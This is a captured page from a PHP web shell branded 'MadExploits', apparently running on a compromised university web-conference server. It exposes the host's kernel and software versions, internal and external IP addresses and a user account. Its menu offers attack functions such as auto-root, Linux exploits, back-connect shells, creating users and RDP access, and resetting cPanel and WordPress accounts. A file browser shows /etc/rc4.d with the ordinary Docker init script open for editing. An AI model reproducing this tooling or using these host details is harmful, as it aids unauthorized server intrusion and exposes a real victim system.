Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.141.197.1
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
rc4.d /
[ HOME SHELL ]
Name
Size
Permission
Action
K01apache-htcacheclean
2.43
KB
-rwxr-xr-x
S01apache2
7.99
KB
-rwxr-xr-x
S01apport
2.85
KB
-rwxr-xr-x
S01atd
1.05
KB
-rwxr-xr-x
S01console-setup.sh
1.2
KB
-rwxr-xr-x
S01cron
2.99
KB
-rwxr-xr-x
S01dbus
3.08
KB
-rwxr-xr-x
S01docker
2.88
KB
-rwxr-xr-x
S01grub-common
985
B
-rwxr-xr-x
S01irqbalance
2.58
KB
-rwxr-xr-x
S01lvm2-lvmpolld
586
B
-rwxr-xr-x
S01mysql
5.48
KB
-rwxr-xr-x
S01open-vm-tools
1.8
KB
-rwxr-xr-x
S01plymouth
1.33
KB
-rwxr-xr-x
S01rsync
4.31
KB
-rwxr-xr-x
S01rsyslog
2.8
KB
-rwxr-xr-x
S01ssh
3.85
KB
-rwxr-xr-x
S01unattended-upgrades
1.36
KB
-rwxr-xr-x
S01uuidd
1.28
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : S01docker
#!/bin/sh set -e ### BEGIN INIT INFO # Provides: docker # Required-Start: $syslog $remote_fs # Required-Stop: $syslog $remote_fs # Should-Start: cgroupfs-mount cgroup-lite # Should-Stop: cgroupfs-mount cgroup-lite # Default-Start: 2 3 4 5 # Default-Stop: 0 1 6 # Short-Description: Create lightweight, portable, self-sufficient containers. # Description: # Docker is an open-source project to easily create lightweight, portable, # self-sufficient containers from any application. The same container that a # developer builds and tests on a laptop can run at scale, in production, on # VMs, bare metal, OpenStack clusters, public clouds and more. ### END INIT INFO export PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin BASE=docker # modify these in /etc/default/$BASE (/etc/default/docker) DOCKERD=/usr/bin/dockerd # This is the pid file managed by docker itself DOCKER_PIDFILE=/var/run/$BASE.pid # This is the pid file created/managed by start-stop-daemon DOCKER_SSD_PIDFILE=/var/run/$BASE-ssd.pid DOCKER_LOGFILE=/var/log/$BASE.log DOCKER_OPTS= DOCKER_DESC="Docker" # Get lsb functions . /lib/lsb/init-functions if [ -f /etc/default/$BASE ]; then . /etc/default/$BASE fi # Check docker is present if [ ! -x $DOCKERD ]; then log_failure_msg "$DOCKERD not present or not executable" exit 1 fi fail_unless_root() { if [ "$(id -u)" != '0' ]; then log_failure_msg "$DOCKER_DESC must be run as root" exit 1 fi } case "$1" in start) fail_unless_root touch "$DOCKER_LOGFILE" chgrp docker "$DOCKER_LOGFILE" # Only set the hard limit (soft limit should remain as the system default of 1024): ulimit -Hn 524288 # Having non-zero limits causes performance problems due to accounting overhead # in the kernel. We recommend using cgroups to do container-local accounting. if [ "$BASH" ]; then ulimit -u unlimited else ulimit -p unlimited fi log_begin_msg "Starting $DOCKER_DESC: $BASE" start-stop-daemon --start --background \ --no-close \ --exec "$DOCKERD" \ --pidfile "$DOCKER_SSD_PIDFILE" \ --make-pidfile \ -- \ -p "$DOCKER_PIDFILE" \ $DOCKER_OPTS \ >> "$DOCKER_LOGFILE" 2>&1 log_end_msg $? ;; stop) fail_unless_root if [ -f "$DOCKER_SSD_PIDFILE" ]; then log_begin_msg "Stopping $DOCKER_DESC: $BASE" start-stop-daemon --stop --pidfile "$DOCKER_SSD_PIDFILE" --retry 10 log_end_msg $? else log_warning_msg "Docker already stopped - file $DOCKER_SSD_PIDFILE not found." fi ;; restart) fail_unless_root docker_pid=$(cat "$DOCKER_SSD_PIDFILE" 2> /dev/null || true) [ -n "$docker_pid" ] \ && ps -p $docker_pid > /dev/null 2>&1 \ && $0 stop $0 start ;; force-reload) fail_unless_root $0 restart ;; status) status_of_proc -p "$DOCKER_SSD_PIDFILE" "$DOCKERD" "$DOCKER_DESC" ;; *) echo "Usage: service docker {start|stop|restart|status}" exit 1 ;; esac
Close